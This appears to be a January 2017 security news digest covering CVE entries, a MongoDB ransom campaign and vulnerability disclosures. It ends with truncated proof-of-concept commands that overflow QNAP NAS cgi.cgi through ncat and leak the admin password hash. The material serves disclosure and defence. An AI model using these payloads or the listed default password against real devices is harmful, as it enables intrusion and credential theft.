The results of the latest study from Kaspersky Lab indicate that social media now leaves many people feeling negative
Monthly Archives: January 2017
Kaspersky Lab Finds Businesses are Unclear on How to Combat Targeted Attacks and DDoS
Nearly four-in-ten businesses admit they are unclear on the most effective protection strategy to combat these types of attacks.
CVE-2016-10115
NETGEAR Arlo base stations with firmware 1.7.5_6178 and earlier, Arlo Q devices with firmware 1.8.0_5551 and earlier, and Arlo Q Plus devices with firmware 1.8.1_6094 and earlier have a default password of 12345678, which makes it easier for remote attackers to obtain access after a factory reset or in a factory configuration.
CVE-2016-10116
NETGEAR Arlo base stations with firmware 1.7.5_6178 and earlier, Arlo Q devices with firmware 1.8.0_5551 and earlier, and Arlo Q Plus devices with firmware 1.8.1_6094 and earlier use a pattern of adjective, noun, and three-digit number for the customized password, which makes it easier for remote attackers to obtain access via a dictionary attack.
Someone Hijacking Unsecured MongoDB Databases for Ransom
Nearly two years back, we warned users about publicly accessible MongoDB instances – almost 600 Terabytes (TB) – over the Internet which require no authentication, potentially leaving websites and servers at risk of hacking.
These MongoDB instances weren’t exposed due to any flaw in its software, but due to a misconfiguration (bad security practice) that let any remote attacker access MongoDB
TinyPDF Installer DLL Hijacking / Unsafe Temp Directory
InstallTinyPDF.exe suffers from dll hijacking and unsafe temp directory vulnerabilities.
Executable installers are vulnerable^WEVIL (case 43): SoftMaker's Office service pack installers allow escalation of privilege
Posted by Stefan Kanthak on Jan 03
Hi @ll,
the service pack installers for SoftMaker Office 201x, available
from <http://www.softmaker.com/en/servicepacks-office-windows>,
are (surprise.-) vulnerable.
The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),
creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract
its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".
"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights…
Executable installers are vulnerable^WEVIL (case 45): ReadPDF's installers allow escalation of privilege
Posted by Stefan Kanthak on Jan 03
Hi @ll,
the executable installer “InstallTinyPDF.exe”, available from
<http://tinypdf.com/downloads.html>, is (surprise.-) vulnerable:
1. DLL hijacking (this is well-known and well-documented; see
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
<https://capec.mitre.org/data/definitions/471.html>,
<…
Re: 0-day: QNAP NAS Devices suffer of heap overflow
Posted by bashis on Jan 03
And also;
==================
[Stack overflow]
==================
[Remote Host]# echo -en “GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en “QUFB”;done“echo -en
“QUJCQkI=”` HTTP/1.0nHost: BUGnn” | ncat –ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Mon, 02 Jan 2017 11:59:24 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain
[Remote Host]#
====
[Local Host]# dmesg | grep…
Re: 0-day: QNAP NAS Devices suffer of heap overflow
Posted by bashis on Jan 03
Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56)
[Remote Host]# echo -en “GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en “B”;done | base64 -w 0 ;
echo -en “Dx56xcex06x08″ | base64 -w 0` HTTP/1.0nHost: BUGnn” | ncat –ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***…
